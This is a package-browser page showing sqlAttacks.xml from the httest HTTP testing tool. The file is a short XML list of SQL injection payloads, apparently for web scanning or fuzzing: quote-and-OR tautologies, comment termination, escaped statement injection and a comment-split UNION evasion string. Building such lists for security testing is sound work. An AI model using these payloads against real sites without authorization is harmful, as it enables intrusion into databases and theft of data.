File: sqlAttacks.xml

package info (click to toggle)
httest 2.4.23-5
  • links: PTS, VCS
  • area: main
  • in suites: forky, sid, trixie
  • size: 4,876 kB
  • sloc: ansic: 19,553; sh: 10,550; xml: 1,047; makefile: 510; lisp: 145; perl: 31
file content (44 lines) | stat: -rw-r--r-- 1,237 bytes parent folder | download | duplicates (6) 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
 
<?xml version="1.0" encoding="UTF-8"?>
<!-- Some of theses SQL Injection are from ha.ckers.org web security lab -->
<sql>
	<attack>
		<name>Basic SQL Injection</name>
		<code>1'GRABBER_SQL_INJECTION</code>
		<label>Basic SQL Injection Attacks</label>
	</attack>
	<attack>
		<name>Logical OR SQL Injection</name>
		<code>1' OR 1 OR 1='</code>
		<label>Logicial SQL Injection Attacks</label>
	</attack>
	<attack>
		<name>Logical OR SQL Injection</name>
		<code>OR 1=1</code>
		<label>Logicial SQL Injection Attacks</label>
	</attack>
	<attack>
		<name>Logical OR SQL Injection</name>
		<code>"OR "1"="1</code>
		<label>Logicial SQL Injection Attacks</label>
	</attack>
	<attack>
		<name>Logical SQL Injection</name>
		<code>1' OR 1 OR 1='</code>
		<label>Logicial SQL Injection Attacks</label>
	</attack>
	<attack>
		<name>Comment SQL Injection</name>
		<code>';--</code>
		<label>Command SQL Injection Attacks</label>
	</attack>
	<attack>
		<name>Escape SQL Injection</name>
		<code>\'; GRABBER_SQL_STATEMENT; --</code>
		<label>Escape SQL Injection Attacks</label>
	</attack>
	<attack>
		<name>Evasion SQL Injection</name>
		<code>1 UNI/**/ON SELECT ALL FROM WHERE</code>
		<label>Evasion SQL Injection Attacks</label>
	</attack>
</sql>